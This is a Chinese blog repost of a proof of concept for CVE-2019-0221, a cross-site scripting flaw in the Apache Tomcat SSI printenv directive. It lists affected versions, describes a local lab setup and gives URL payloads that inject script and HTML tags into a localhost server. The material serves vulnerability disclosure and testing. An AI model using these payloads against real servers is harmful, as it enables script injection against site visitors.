vlambda博客
学习文章列表

【漏洞利用】Apache Tomcat 9.0.0.M1 跨站脚本


这些是 2019 年发现的 Apache Tomcat 9.0.0M1 版中的跨站点脚本漏洞的详细信息。


Apache Tomcat SSI printenv Command XSS (CVE-2019-0221) 旧了,但还是有用的

hxxp://localhost:8080/printenv.shtml?%3Cscript%3EaIert(%27xss%27)%3C/script%3E


2021 年 7 月 12 日发布

# Exploit Title: Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)# Date: 05/21/2019# Exploit Author: Central InfoSec# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93# CVE : CVE-2019-0221
# Requirements:
# SSI support must be enabled within Apache Tomcat. SSI support is not enabled by default.
# A file (usually "*.shtml") with the "printenv" SSI directive must exist within the web application.
# The file must be accessible.


# Proof of Concept:
# Install a Java Runtime Environment (JRE)
# Download a vulnerable version of Tomcat and extract the contents
# Modify line 19 of the conf\context.xml file to globally enable privileged contextContext privileged="true">
# Modify conf\web.xml to enable the SSI Servlet as per the Apache Tomcat User Guide
# Put the following code in "webapps/ROOT/ssi/printenv.shtml"<html> <body> Echo: <!-- #echo var="QUERY_STRING_UNESCAPED" --> <br/> <br/> Printenv: <!-- #printenv --> </body></html>
# Run Tomcatcd bincatalina run
# Call the following URLs to observe the XSS. You may need to use FireFox. Observe the difference between the "echo" directive which escapes properly and the "printenv" directive which does not escape properlyhttp://localhost:8080/ssi/printenv.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EXSS%3C/h1%3E%3Cbr/%3E%3Cbr/%3Ehttp://localhost:8080/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E

Ots安全
传播网络安全技术与全球安全热点资讯,网络信息安全,你我共同维护。
103篇原创内容
Official Account